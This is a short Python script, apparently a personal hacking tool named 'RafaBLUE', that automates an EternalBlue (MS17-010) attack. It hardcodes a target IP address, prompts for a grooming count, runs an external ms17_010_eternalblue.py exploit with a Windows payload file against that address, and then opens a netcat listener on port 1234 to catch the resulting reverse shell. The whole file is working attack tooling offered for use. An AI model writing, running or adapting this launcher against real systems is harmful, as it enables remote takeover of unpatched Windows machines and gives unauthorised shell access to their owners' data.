#!/usr/bin/env python3


try:
	import sys
	import os
	from colorama import Fore, Style
	import time
	import pyperclip


	
	IP_a_atacar = "192.168.168.170" 


	groom = "13"

	os.system("clear")
	print()
	print()
	print(Fore.CYAN + Style.BRIGHT + "RafaBLUE" + Style.RESET_ALL)
	time.sleep(0.5)
	groom = input(Fore.YELLOW + " [+] Introduce la cantidad de potencia (ENTER para el predeterminado: 13): " + Style.RESET_ALL)

	ataque = f"python3 ms17_010_eternalblue.py {IP_a_atacar} PAYLOADWIN.bin {groom} 2>/dev/null"
	os.system(ataque)

	time.sleep(0.5)
	print()
	os.system("clear")
	netcat = f"rlwrap nc -lnvp 1234"	
	
	os.system(netcat)
except KeyboardInterrupt:
	print()
	print(Fore.RED + " [!] Saliendo...")

